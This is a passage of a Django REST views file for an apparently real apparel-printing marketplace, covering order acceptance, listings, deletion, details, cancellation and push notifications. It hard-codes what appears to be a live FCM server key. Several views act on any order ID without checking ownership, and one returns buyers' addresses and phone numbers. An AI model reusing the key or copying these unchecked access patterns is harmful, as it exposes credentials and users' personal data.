                        "transaction_id": order.transaction_id,
                        "transaction_time":order.transaction_time,
                        "order_id": order.id,
                        "transactionstatus":1,
                        }
                        return Response({'message':'Payment Successfull, Order has been created', 'payment': Details}, status=status.HTTP_200_OK)
                    else:
                        return Response({"status": "0", 'message':errorMessage}, status=status.HTTP_401_UNAUTHORIZED)
            else:
                return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
    except Exception as e:
        print(traceback.format_exc())
        return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
# posts = Post.objects.filter(user_id=user.id,post_status=1)
# post1 = PostImage.objects.values('post_images').filter(post_id__in = posts)
#==================================================
# follow send notification
#==================================================
def SendSetFollowNotification(senderId, receiverId, title, message, tag, table_id):
    """Send an FCM push for a follow event to the receiver's registered device.

    Returns True when the push service reports a result, False on any
    failure (user lookup error, push error).

    NOTE(review): the FCM server key is hard-coded here — consider moving it
    to settings/environment.
    """
    try:
        service = FCMNotification(api_key="AAAAVQB1c9E:APA91bGcmaXhcyevDS9XKCF3lATdSoxMPqNoIZIDO8o34VCjV-Aj5hiAW1M5CwtBBeBVm1IsUVpQBtVLWTAG6isdVfxzGdMAFFHKzee7X72uYqWbeppdcAQbt0g9FrWhrbld4ZROgoeY")
        target = User.objects.get(id=receiverId)
        device_ids = [target.deviceId]
        if len(device_ids) > 0:
            payload = {
                "message_title": title,
                "message_body": message,
                "post_id": table_id,
                "tag": tag,
                "sender_id": senderId,
                "receiver_id": receiverId
            }
            outcome = service.notify_multiple_devices(registration_ids=device_ids, message_title=title, sound="default", message_body=message, data_message=payload)
            return outcome is not None
    except Exception:
        return False
#==========================================================
# Accept/Reject Order
#==========================================================
@AppVersion_required
@api_view(['POST'])
def AcceptRejectOrder(request):
    """Let a seller accept (order_status == 1) or reject (== 0) an OrderPost.

    On accept: marks the line ACCEPTED, rolls its price into the seller's
    open DuePayment row (creating one if none is open), records a DB
    Notification for the buyer, and sends a push when the buyer has
    notifications enabled and an active token. On reject: just marks the
    line REJECTED. Any other ``order_status`` value is answered with 401.
    """
    try:
        with transaction.atomic():
            API_key = request.META.get('HTTP_AUTHORIZATION')
            if API_key is not None:
                try:
                    token1 = Token.objects.get(key=API_key)
                    user = token1.user
                    checkGroup = user.groups.filter(name='User').exists()
                except:
                    return Response({"message" : "Session expired!! please login again", "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
                if checkGroup:
                    orderpost_id = request.data['order_id']
                    order_status = request.data['order_status']
                    nowTime = datetime.datetime.utcnow().replace(tzinfo=utc)
                    if order_status == 1:
                        OrderPost.objects.filter(id = orderpost_id).update(order_status = ORDER_STATUS_ACCEPTED)
                        rec_id = OrderPost.objects.get(id = orderpost_id)  # the accepted line
                        recvId = rec_id.user_id  # the buyer who placed the order
                        # Accrue the line price onto the seller's open due payment.
                        user_exist= DuePayment.objects.filter(user_id=user.id,payment_status=1).exists()
                        if user_exist:
                            due_user = DuePayment.objects.get(user_id=user.id,payment_status=1)
                            due_amount = due_user.amount
                            print(due_amount,"kkk")
                            DuePayment.objects.filter(user_id=user.id,payment_status=1).update(amount=due_amount+rec_id.price)
                        else:
                            DuePayment.objects.create(user_id =user.id,
                            amount = rec_id.price,
                            payment_status = 1
                            )
                        id_noti = User.objects.get(id=recvId)
                        print(id_noti.onoffnotification)
                        if id_noti.onoffnotification == 1:
                            noti = Notification.objects.create(id = uuid.uuid1(),
                            receiver_id = recvId,
                            sender_id = user.id,
                            message = "Accept your order",
                            tag = "Order Accept",
                            notification_time = nowTime,
                            table_id = rec_id.id,
                            order_id = rec_id.id)
                            try:
                                # Push only when the buyer is logged in somewhere.
                                Token.objects.get(user_id=recvId)
                                notify = SendAcceptOrderNotification(rec_id.id,str(user.fullname)+"has accepted your order","Order Accept",user.id,recvId)
                                return Response({'message':'Order has been accepted'}, status=status.HTTP_200_OK)
                            except:
                                # No active token / push failure: accept still succeeds.
                                return Response({'message':'Order has been accepted'}, status=status.HTTP_200_OK)
                        else:
                            # Notifications off: only the DB record, no push.
                            noti = Notification.objects.create(id = uuid.uuid1(),
                            receiver_id = recvId,
                            sender_id = user.id,
                            message = "Accept your order",
                            tag = "Order Accept",
                            notification_time = nowTime,
                            table_id = rec_id.id,
                            order_id = rec_id.id)
                            return Response({'message':'Order has been accepted'}, status=status.HTTP_200_OK)
                    elif order_status == 0:
                        OrderPost.objects.filter(id = orderpost_id).update(order_status = ORDER_STATUS_REJECTED)
                        return Response({'message':'Order has been rejected'}, status=status.HTTP_200_OK)
                    else:
                        return Response({"status": "0", 'message':errorMessage}, status=status.HTTP_401_UNAUTHORIZED)
                else:
                    return Response({"status": "0", 'message':errorMessage}, status=status.HTTP_401_UNAUTHORIZED)
            else:
                return Response({"status": "0", 'message':errorMessage}, status=status.HTTP_401_UNAUTHORIZED)
    except Exception as e:
        print(traceback.format_exc())
        return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#==========================================================
#Past Orders
#==========================================================
from collections import defaultdict
@AppVersion_required
@api_view(['POST'])
def PastOrders(request):
    """List the caller's own orders (order_status in 1/2/0/-2, not
    buyer-hidden), 20 per page, grouped by creation date.

    POST body: ``timeZone`` (read but unused here — the astimezone line is
    commented out); query param: ``page_num``. Response: ``response`` is a
    list of {"date": d, "list": [rows]} buckets plus ``has_next``.
    """
    try:
        with transaction.atomic():
            received_json_data = json.loads(request.body.decode('utf-8'), strict=False)
            API_key = request.META.get('HTTP_AUTHORIZATION')
            if API_key is not None:
                try:
                    token1 = Token.objects.get(key=API_key)
                    user = token1.user
                    checkGroup = user.groups.filter(name='User').exists()
                except:
                    return Response({"message": "Session expired!! please login again", "status": "0"},
                                    status=status.HTTP_401_UNAUTHORIZED)
                if checkGroup:
                    page_num = request.GET['page_num']
                    order1 = OrderPost.objects.filter(Q(order_status=1) | Q(order_status=2) | Q(order_status=0) | Q(order_status=-2)).filter (user_id = user.id).exclude(buyer_status = -1).order_by('-created_time')
                    paginator = Paginator(order1, 20)
                    try:
                        order1 = paginator.page(page_num)
                    except:
                        order1 = None  # out-of-range page -> empty response below
                    timeZone = received_json_data["timeZone"]
                    mainObject = {}
                    if order1:
                        order1serializer = OrderPostSerializer(order1,many=True)
                        order_data = order1serializer.data
                        if order_data.__len__() > 0:
                            oldDate = None
                            mainObject = []
                            tempNum = 0  # index of the current row in order_data
                            for data in order_data:
                                # Enrich each serialized row with post/seller details.
                                obj2 = User.objects.get(id = data['user'])
                                obj3 = PostImage.objects.get(id = data['post_images'])
                                ob = PostImage.objects.filter(post_id = data['post'])
                                obj1 = Post.objects.get(id = data['post'])
                                price = obj1.price
                                obj4 = Size.objects.get(id = data['size'])
                                data['size_name'] = obj4.size
                                data['price'] = str(price)
                                data['serviceCharge'] = 6.00
                                data['shippingCost'] = 4.99
                                data['post_printing_size_front'] = obj1.post_printing_size_front
                                data['post_printing_size_back'] = obj1.post_printing_size_back
                                data['post_description'] = obj1.post_description
                                data['fullname'] = obj2.fullname
                                t=[]
                                if obj1.post_type=="custom":
                                    # Custom posts: show the first of all post images.
                                    for i in ob:
                                        t.append(i.post_images)
                                    data['post_image'] = t[0]
                                else:
                                    data['post_image'] = obj3.post_images
                                data['colour_name'] = "Black"
                                data['post_by'] = obj1.user.fullname
                                newDate = datetime.datetime.strptime(data['created_time'], '%Y-%m-%dT%H:%M:%S.%fZ')
                                # newDate = newDate.astimezone(timezone(timeZone)).replace(tzinfo=None)
                                newDate = newDate.date()
                                # Date-bucketing: `b` tracks whether the current row still
                                # needs appending to the open bucket at the end of the pass.
                                b = True
                                if oldDate is None:
                                    oldDate = newDate
                                    if tempNum == 0:
                                        listTemp = []
                                        listTemp.append(data)
                                        b = False
                                if oldDate != newDate:
                                    # Date changed: flush the finished bucket, start a new one.
                                    mainObject.append({"date":oldDate, "list":listTemp})
                                    oldDate = newDate
                                    listTemp = []
                                    listTemp.append(data)
                                    if order_data.__len__() == tempNum+1:
                                        if tempNum != 0:
                                            pass
                                        mainObject.append({"date":oldDate, "list":listTemp})
                                        tempNum = tempNum+1
                                        b = False
                                if order_data.__len__() == tempNum+1:
                                    # Last row of the page: flush the open bucket.
                                    if tempNum != 0:
                                        listTemp.append(data)
                                    mainObject.append({"date":oldDate, "list":listTemp})
                                    b = False
                                if b:
                                    listTemp.append(data)
                                tempNum = tempNum + 1;
                            return Response({"response":mainObject, 'has_next':order1.has_next()}, status=status.HTTP_200_OK)
                        else:
                            return Response({"data" : []}, status=status.HTTP_200_OK)
                else:
                    return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            else:
                return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
    except Exception as e:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#==============================================
#Listing of My Req Tab
#==============================================
from collections import defaultdict
from pytz import timezone
@AppVersion_required
@api_view(['POST'])
def MyRequest(request):
    """List incoming orders placed on the caller's own posts ("My Requests"),
    20 per page, grouped by creation date in the caller's timezone.

    POST body: ``timeZone`` (IANA name, used for the date conversion);
    query param: ``page_num``. Seller-hidden rows (seller_status == -1)
    are excluded. Response mirrors PastOrders: ``response`` is a list of
    {"date": d, "list": [rows]} buckets plus ``has_next``.
    """
    try:
        with transaction.atomic():
            received_json_data = json.loads(request.body.decode('utf-8'), strict=False)
            API_key = request.META.get('HTTP_AUTHORIZATION')
            if API_key is not None:
                try:
                    token1 = Token.objects.get(key=API_key)
                    user = token1.user
                    checkGroup = user.groups.filter(name='User').exists()
                except:
                    return Response({"message": "Session expired!! please login again", "status": "0"},
                                    status=status.HTTP_401_UNAUTHORIZED)
                if checkGroup:
                    page_num = request.GET['page_num']
                    # orderpostobj = OrderPost.objects.filter(post_id__user_id=user.id, order_status="PENDING").order_by('-created_time')
                    orderpostobj = OrderPost.objects.filter(post_id__user_id=user.id).exclude(seller_status = -1 ).order_by('-created_time')
                    paginator = Paginator(orderpostobj,20)
                    try:
                        orderpostobj = paginator.page(page_num)
                    except:
                        orderpostobj = None  # out-of-range page -> empty response below
                    timeZone = received_json_data["timeZone"]
                    mainObject = {}
                    if orderpostobj:
                        orderpostserializer = OrderPostSerializer(orderpostobj,many=True)
                        order_list = orderpostserializer.data
                        if order_list.__len__() > 0:
                            oldDate = None
                            mainObject = []
                            tempNum = 0  # index of the current row in order_list
                            for data in order_list:
                                # Enrich each serialized row with post/buyer details.
                                obj2 = User.objects.get(id = data['user'])
                                obj3 = PostImage.objects.get(id = data['post_images'])
                                ob = PostImage.objects.filter(post_id = data['post'])
                                obj1 = Post.objects.get(id = data['post'])
                                price = obj1.price
                                obj4 = Size.objects.get(id = data['size'])
                                data['size_name'] = obj4.size
                                data['colour_name'] = "Black"
                                data['post_description'] = obj1.post_description
                                data['post_printing_size_front'] = obj1.post_printing_size_front
                                data['post_printing_size_back'] = obj1.post_printing_size_back
                                data['price'] = str(price)
                                data['shippingCost'] = 4.99
                                data['fullname'] = obj2.fullname
                                t=[]
                                if obj1.post_type=="custom":
                                    # Custom posts: show the first of all post images.
                                    for i in ob:
                                        t.append(i.post_images)
                                    data['post_image'] = t[0]
                                else:
                                    data['post_image'] = obj3.post_images
                                #data['colour'] = obj3.colour_id
                                data['post_by'] = obj1.user.fullname
                                newDate = datetime.datetime.strptime(data['created_time'], '%Y-%m-%dT%H:%M:%S.%fZ')
                                newDate = newDate.astimezone(timezone(timeZone)).replace(tzinfo=None)
                                # nowTime = newDate.timezone.now().replace(tzinfo=None).replace(microsecond=0)
                                newDate = newDate.date()
                                # Date-bucketing: `b` tracks whether the current row still
                                # needs appending to the open bucket at the end of the pass.
                                b = True
                                if oldDate is None:
                                    oldDate = newDate
                                    if tempNum == 0:
                                        listTemp = []
                                        listTemp.append(data)
                                        b = False
                                if oldDate != newDate:
                                    # Date changed: flush the finished bucket, start a new one.
                                    mainObject.append({"date":oldDate, "list":listTemp})
                                    oldDate = newDate
                                    listTemp = []
                                    listTemp.append(data)
                                    if order_list.__len__() == tempNum+1:
                                        if tempNum != 0:
                                            pass
                                        mainObject.append({"date":oldDate, "list":listTemp})
                                        tempNum = tempNum+1
                                        b = False
                                if order_list.__len__() == tempNum+1:
                                    # Last row of the page: flush the open bucket.
                                    if tempNum != 0:
                                        listTemp.append(data)
                                    mainObject.append({"date":oldDate, "list":listTemp})
                                    b = False
                                if b:
                                    listTemp.append(data)
                                tempNum = tempNum + 1;
                            return Response({"response":mainObject, 'has_next':orderpostobj.has_next()}, status=status.HTTP_200_OK)
                        else:
                            return Response({"data" : []}, status=status.HTTP_200_OK)
                else:
                    return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            else:
                return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
    except Exception as e:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#====================================================
#Order Delete
#====================================================
@AppVersion_required
@api_view(['POST'])
def OrderDelete11(request):
    """Soft-delete one order line (POST body: ``order_id``): hides it from
    the seller's list when the caller owns the underlying post, otherwise
    from the buyer's list.

    NOTE(review): when the update matches no rows, or when no Authorization
    header is sent, the view falls through without an explicit return —
    kept as-is to preserve behavior.
    """
    try:
        with transaction.atomic():
            auth_key = request.META.get('HTTP_AUTHORIZATION')
            if auth_key is not None:
                try:
                    auth_token = Token.objects.get(key=auth_key)
                    caller = auth_token.user
                    is_user = caller.groups.filter(name='User').exists()
                except:
                    return Response({"message" : "Session expired!! please login again", "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
                target_id = request.data['order_id']
                if is_user:
                    # Decide which side of the transaction hides the row.
                    seller_owned = OrderPost.objects.filter(id=target_id, post_id__user_id=caller.id).exists()
                    hide_field = 'seller_status' if seller_owned else 'buyer_status'
                    updated = OrderPost.objects.filter(id=target_id).update(**{hide_field: -1})
                    if updated:
                        return Response({"message" : deleteSuccessMessage}, status=status.HTTP_200_OK)
                else:
                    return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#====================================================
#Order Delete
#====================================================
@AppVersion_required
@api_view(['POST'])
def OrderDelete(request):
    """Soft-delete one order line and return the refreshed, date-grouped page.

    POST body: ``order_id``, ``page_num``, ``type`` ("my_request" selects the
    seller-side flow, anything else the buyer/past-orders flow), ``timeZone``.
    The row is hidden via seller_status/buyer_status = -1 depending on whether
    the caller owns the underlying post. ``po``/``po1`` hold the flat index of
    the first item of the NEXT page in the respective list, or the string
    "false" when the list ends before it — presumably used to decide whether
    the client can pull one replacement row; confirm against the app code.
    """
    try:
        with transaction.atomic():
            API_key = request.META.get('HTTP_AUTHORIZATION')
            if API_key is not None:
                try:
                    token1 = Token.objects.get(key=API_key)
                    user = token1.user
                    checkGroup = user.groups.filter(name='User').exists()
                except:
                    return Response({"message" : "Session expired!! please login again", "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
                order_id = request.data['order_id']
                page_num = request.data['page_num']
                if checkGroup:
                    # Seller-side list: orders placed on the caller's posts.
                    orderpostobj = OrderPost.objects.filter(post_id__user_id=user.id).exclude(seller_status = -1 ).order_by('-created_time')
                    aa=[]
                    for i in orderpostobj:
                        aa.append(i.id)
                    a_len = len(aa)
                    # round_re =int(round( a_len/5))
                    # if a_len/5 >round_re:
                    #     pages = round_re+1
                    # else:
                    #     pages = round_re
                    # n=5
                    # ww= [aa[i:i+n] for i in range(0, len(aa), n)]
                    # for index ,s in enumerate(ww):
                    #     for index1 ,ss in enumerate(s):
                    #         if ss == order_id:
                    #             page_num = index+1
                    po1 = (page_num*20)  # flat index of the first row of the next page
                    # for index, s in enumerate(aa):
                    if po1 >= a_len:
                        po1 ="false"
                    # if page_num < pages:
                    #     has_next=True
                    # else:
                    #     has_next=False
                    # Buyer-side list: the caller's own past orders.
                    order1 = OrderPost.objects.filter(Q(order_status=1) | Q(order_status=2) | Q(order_status=0) | Q(order_status=-2)).filter (user_id = user.id).exclude(buyer_status = -1).order_by('-created_time')
                    a=[]
                    for i in order1:
                        a.append(i.id)
                    a_len = len(a)
                    # round_re1 =int(round( a_len/5))
                    # if a_len/5 >round_re1:
                    #     pages1 = round_re1+1
                    # else:
                    #     pages1 = round_re1
                    # ww1= [a[i:i+n] for i in range(0, len(a), n)]
                    # for indexx ,s1 in enumerate(ww1):
                    #     for index3 ,ss1 in enumerate(s1):
                    #         if ss1 == order_id:
                    #             page_num = indexx + 1
                    po = (page_num*20)  # same next-page index for the buyer list
                    #for index, s in enumerate(a):
                    if po >= a_len:
                        po ="false"
                    # if page_num < pages1:
                    #     has_next=True
                    # else:
                    #     has_next=False
                    # Hide the row on whichever side the caller owns.
                    orderobj = OrderPost.objects.filter(id = order_id).filter(post_id__user_id = user.id)
                    if orderobj:
                        order1 = OrderPost.objects.filter(id = order_id).update(seller_status = -1)
                        # notify = Notification.objects.filter(tag = "order place").
                    else:
                        order1 = OrderPost.objects.filter(id = order_id).update(buyer_status = -1)
                    if order1:
                        if request.data['type'] == "my_request":
                            if po1=="false":
                                return Response({"response" : [],"message" : deleteSuccessMessage,"has_next": False}, status=status.HTTP_200_OK)
                            # Serialize the single replacement row plus the page for has_next.
                            orderpostobj = OrderPost.objects.filter(id=aa[po1])
                            orderpostobj1 = OrderPost.objects.filter(post_id__user_id=user.id).exclude(seller_status = -1 ).order_by('-created_time')
                            paginator = Paginator(orderpostobj1,20)
                            try:
                                orderpostobj1 = paginator.page(page_num)
                            except:
                                orderpostobj1 = None
                            timeZone = request.data["timeZone"]
                            mainObject = {}
                            if orderpostobj:
                                orderpostserializer = OrderPostSerializer(orderpostobj,many=True)
                                order_list = orderpostserializer.data
                                if order_list.__len__() > 0:
                                    oldDate = None
                                    mainObject = []
                                    tempNum = 0
                                    for data in order_list:
                                        print(1)
                                        # Enrich the serialized row (same shape as MyRequest).
                                        obj2 = User.objects.get(id = data['user'])
                                        obj3 = PostImage.objects.get(id = data['post_images'])
                                        ob = PostImage.objects.filter(post_id = data['post'])
                                        obj1 = Post.objects.get(id = data['post'])
                                        price = obj1.price
                                        obj4 = Size.objects.get(id = data['size'])
                                        data['size_name'] = obj4.size
                                        # data['colour_name'] = obj3.colour.colour
                                        data['post_description'] = obj1.post_description
                                        data['post_printing_size_front'] = obj1.post_printing_size_front
                                        data['post_printing_size_back'] = obj1.post_printing_size_back
                                        data['price'] = str(price)
                                        data['shippingCost'] = 4.99
                                        data['fullname'] = obj2.fullname
                                        t=[]
                                        if obj1.post_type=="custom":
                                            for i in ob:
                                                t.append(i.post_images)
                                            data['post_image'] = t[0]
                                        else:
                                            data['post_image'] = obj3.post_images
                                        # data['colour'] = obj3.colour_id
                                        data['post_by'] = obj1.user.fullname
                                        newDate = datetime.datetime.strptime(data['created_time'], '%Y-%m-%dT%H:%M:%S.%fZ')
                                        newDate = newDate.astimezone(timezone(timeZone)).replace(tzinfo=None)
                                        # nowTime = newDate.timezone.now().replace(tzinfo=None).replace(microsecond=0)
                                        newDate = newDate.date()
                                        # Date-bucketing (same state machine as PastOrders/MyRequest).
                                        b = True
                                        if oldDate is None:
                                            oldDate = newDate
                                            if tempNum == 0:
                                                listTemp = []
                                                listTemp.append(data)
                                                b = False
                                        if oldDate != newDate:
                                            mainObject.append({"date":oldDate, "list":listTemp})
                                            oldDate = newDate
                                            listTemp = []
                                            listTemp.append(data)
                                            b = False
                                        if order_list.__len__() == tempNum+1:
                                            if tempNum != 0:
                                                listTemp.append(data)
                                            mainObject.append({"date":oldDate, "list":listTemp})
                                            b = False
                                        if b:
                                            listTemp.append(data)
                                        tempNum = tempNum + 1;
                                    return Response({"response":mainObject,"message" : deleteSuccessMessage ,"has_next": orderpostobj1.has_next()}, status=status.HTTP_200_OK)
                                else:
                                    return Response({"data" : [],"response":mainObject}, status=status.HTTP_200_OK)
                        else:
                            # Buyer/past-orders flow.
                            if po=="false":
                                return Response({"response" : [],"message" : deleteSuccessMessage, "has_next":False}, status=status.HTTP_200_OK)
                            #page_num = request.data['page_num']
                            order1 = OrderPost.objects.filter(id=a[po])
                            order11 = OrderPost.objects.filter(Q(order_status=1) | Q(order_status=2) | Q(order_status=0) | Q(order_status=-2)).filter (user_id = user.id).exclude(buyer_status = -1).order_by('-created_time')
                            paginator = Paginator(order11, 20)
                            try:
                                order11 = paginator.page(page_num)
                            except:
                                order11 = None
                            timeZone = request.data["timeZone"]
                            mainObject = {}
                            if order1:
                                order1serializer = OrderPostSerializer(order1,many=True)
                                order_data = order1serializer.data
                                if order_data.__len__() > 0:
                                    oldDate = None
                                    mainObject = []
                                    tempNum = 0
                                    for data in order_data:
                                        # Enrich the serialized row (same shape as PastOrders).
                                        obj2 = User.objects.get(id = data['user'])
                                        print(obj2,"obj2")
                                        obj3 = PostImage.objects.get(id = data['post_images'])
                                        ob = PostImage.objects.filter(post_id = data['post'])
                                        print(data['post'],"hh")
                                        print(ob,"kk")
                                        obj1 = Post.objects.get(id = data['post'])
                                        print(obj1,"obj1")
                                        price = obj1.price
                                        obj4 = Size.objects.get(id = data['size'])
                                        data['size_name'] = obj4.size
                                        data['price'] = str(price)
                                        data['serviceCharge'] = 6.00
                                        data['shippingCost'] = 4.99
                                        data['post_description'] = obj1.post_description
                                        data['post_printing_size_front'] = obj1.post_printing_size_front
                                        data['post_printing_size_back'] = obj1.post_printing_size_back
                                        data['fullname'] = obj2.fullname
                                        print(obj2.fullname,"fullname")
                                        t=[]
                                        if obj1.post_type=="custom":
                                            for i in ob:
                                                t.append(i.post_images)
                                            data['post_image'] = t[0]
                                        else:
                                            data['post_image'] = obj3.post_images
                                        #data['colour_name'] = obj3.colour.colour
                                        data['post_by'] = obj1.user.fullname
                                        print(obj1.user.fullname)
                                        #data['colour'] = obj3.colour_id
                                        newDate = datetime.datetime.strptime(data['created_time'], '%Y-%m-%dT%H:%M:%S.%fZ')
                                        # newDate = newDate.astimezone(timezone(timeZone)).replace(tzinfo=None)
                                        newDate = newDate.date()
                                        # Date-bucketing (same state machine as PastOrders/MyRequest).
                                        b = True
                                        if oldDate is None:
                                            oldDate = newDate
                                            if tempNum == 0:
                                                listTemp = []
                                                listTemp.append(data)
                                                b = False
                                        if oldDate != newDate:
                                            mainObject.append({"date":oldDate, "list":listTemp})
                                            oldDate = newDate
                                            listTemp = []
                                            listTemp.append(data)
                                            b = False
                                        if order_data.__len__() == tempNum+1:
                                            if tempNum != 0:
                                                listTemp.append(data)
                                            mainObject.append({"date":oldDate, "list":listTemp})
                                            b = False
                                        if b:
                                            listTemp.append(data)
                                        tempNum = tempNum + 1;
                                    return Response({"response":mainObject,"message" : deleteSuccessMessage,"has_next": order11.has_next(),"message" : deleteSuccessMessage}, status=status.HTTP_200_OK)
                                else:
                                    return Response({"data" : [],"message" : deleteSuccessMessage}, status=status.HTTP_200_OK)
                else:
                    return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#====================================================
#Order Detail
#======================================================
@AppVersion_required
@api_view(['POST'])
def OrderDetail(request):
    """Return the enriched detail of a single OrderPost (POST body: ``order_id``).

    Two near-identical branches build the payload: "custom" posts attach
    every image of the post, other posts attach only the ordered image row.
    NOTE(review): the final Response uses the loop variable after the for
    loop, so only the last serialized row is returned — presumably order_id
    is unique and the loop runs once; confirm.
    """
    try:
        with transaction.atomic():
            API_key = request.META.get('HTTP_AUTHORIZATION')
            if API_key is not None:
                try:
                    token1 = Token.objects.get(key=API_key)
                    user = token1.user
                    checkGroup = user.groups.filter(name='User').exists()
                except:
                    return Response({"message" : "Session expired!! please login again", "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
                order_id = request.data['order_id']
                if checkGroup:
                    order1 = OrderPost.objects.filter(id = order_id)
                    if order1:
                        order1serializer = OrderPostSerializer(order1,many=True)
                        order_data = order1serializer.data
                        for data in order_data:
                            obj1 = Post.objects.get(id = data['post'])
                            if obj1.post_type=="custom":
                                # Custom post: attach ALL images of the post.
                                price = obj1.price
                                obj2 = PostImage.objects.get(id = data['post_images'])
                                ob = PostImage.objects.filter(post_id = data['post'])
                                obj3 = User.objects.get(id = data['user'])  # the buyer
                                obj4 = Size.objects.get(id = data['size'])
                                data['size_name'] = obj4.size
                                data['colour_name'] = "Black"
                                temp=[]
                                for i in ob:
                                    temp.append(i.post_images)
                                data['post_images'] = temp
                                #data['colour'] = obj2.colour_id
                                data['post_description'] = obj1.post_description
                                data['price'] = str(price)
                                data['serviceCharge'] = 6.00
                                data['shippingCost'] = 4.99
                                data['order_by'] = obj3.fullname
                                data['order_by_image'] = obj3.image
                                data['post_printing_size_front'] = obj1.post_printing_size_front
                                data['post_printing_size_back'] = obj1.post_printing_size_back
                                order_by_id = obj3.id
                                design_by_id = obj1.user.id
                                data['design_by_id'] = design_by_id
                                data['design_by'] = obj1.user.fullname
                                data['design_by_image'] = obj1.user.image
                                data['design_by_address'] = obj1.user.address
                                newDate = datetime.datetime.strptime(data['created_time'], '%Y-%m-%dT%H:%M:%S.%fZ')
                                newDate = newDate.date()
                                data['date'] = newDate
                                # Chat partner id: the other party in the order.
                                if order_by_id == user.id:
                                    data['message_id'] = obj1.user.id
                                else:
                                    data['message_id'] = obj3.id
                                report1 = ReportPost.objects.filter(user_id = user.id, post_id = obj1.id)
                                if report1:
                                    data['report_post'] = True
                                else:
                                    data['report_post'] = False
                                # Shipping address: taken from the buyer's latest order.
                                last_ad = OrderTrn.objects.filter(user_id=obj3.id).order_by('-transaction_time').first()
                                if last_ad:
                                    add1 = Addresses.objects.filter(id=last_ad.address.id,status=1).values("first_name","last_name","city","postal_code","city","address","phone")
                                    if add1:
                                        data['order_by_address'] = add1
                            else:
                                # Standard post: attach only the ordered image row.
                                price = obj1.price
                                obj2 = PostImage.objects.get(id = data['post_images'])
                                ob = PostImage.objects.filter(id = data['post_images'])
                                obj3 = User.objects.get(id = data['user'])  # the buyer
                                obj4 = Size.objects.get(id = data['size'])
                                data['size_name'] = obj4.size
                                data['colour_name'] = "Black"
                                temp1=[]
                                for i in ob:
                                    temp1.append(i.post_images)
                                data['post_images'] = temp1
                                #data['colour'] = obj2.colour_id
                                data['post_description'] = obj1.post_description
                                data['price'] = str(price)
                                data['serviceCharge'] = 6.00
                                data['shippingCost'] = 4.99
                                data['order_by'] = obj3.fullname
                                data['order_by_image'] = obj3.image
                                data['post_printing_size_front'] = obj1.post_printing_size_front
                                data['post_printing_size_back'] = obj1.post_printing_size_back
                                order_by_id = obj3.id
                                design_by_id = obj1.user.id
                                data['design_by_id'] = design_by_id
                                data['design_by'] = obj1.user.fullname
                                data['design_by_image'] = obj1.user.image
                                data['design_by_address'] = obj1.user.address
                                newDate = datetime.datetime.strptime(data['created_time'], '%Y-%m-%dT%H:%M:%S.%fZ')
                                newDate = newDate.date()
                                data['date'] = newDate
                                # Chat partner id: the other party in the order.
                                if order_by_id == user.id:
                                    data['message_id'] = obj1.user.id
                                else:
                                    data['message_id'] = obj3.id
                                report1 = ReportPost.objects.filter(user_id = user.id, post_id = obj1.id)
                                if report1:
                                    data['report_post'] = True
                                else:
                                    data['report_post'] = False
                                # Shipping address: taken from the buyer's latest order.
                                last_ad = OrderTrn.objects.filter(user_id=obj3.id).order_by('-transaction_time').first()
                                if last_ad:
                                    add1 = Addresses.objects.filter(id=last_ad.address.id,status=1).values("first_name","last_name","city","postal_code","city","address","phone")
                                    if add1:
                                        data['order_by_address'] = add1
                        return Response({"data":data}, status=status.HTTP_200_OK)
                    else:
                        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
                else:
                    return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            else:
                return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
    except Exception as e:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#======================================================
# Cancel Order
#======================================================
@AppVersion_required
@api_view(['POST'])
def CancelOrder(request):
    """Cancel an order: set its status to ORDER_STATUS_CANCEL.

    Expects the auth token in the Authorization header and a payload with
    'order_id' and 'order_status' (cancellation only proceeds when the
    client sends order_status == -2).
    """
    try:
        with transaction.atomic():
            auth_token = request.META.get('HTTP_AUTHORIZATION')
            # Guard clauses: reject early instead of nesting.
            if auth_token is None:
                return Response({"status": "0", 'message':errorMessage}, status=status.HTTP_401_UNAUTHORIZED)
            try:
                session = Token.objects.get(key=auth_token)
                is_app_user = session.user.groups.filter(name='User').exists()
            except:
                return Response({"message" : "Session expired!! please login again", "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            if not is_app_user:
                return Response({"status": "0", 'message':errorMessage}, status=status.HTTP_401_UNAUTHORIZED)
            target_order_id = request.data['order_id']
            requested_status = request.data['order_status']
            if requested_status != -2:
                return Response({"status": "0", 'message':errorMessage}, status=status.HTTP_401_UNAUTHORIZED)
            OrderPost.objects.filter(id = target_order_id).update(order_status = ORDER_STATUS_CANCEL)
            return Response({'message':'Order has been Cancelled'}, status=status.HTTP_200_OK)
    except Exception as e:
        print(traceback.format_exc())
        return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#====================================================
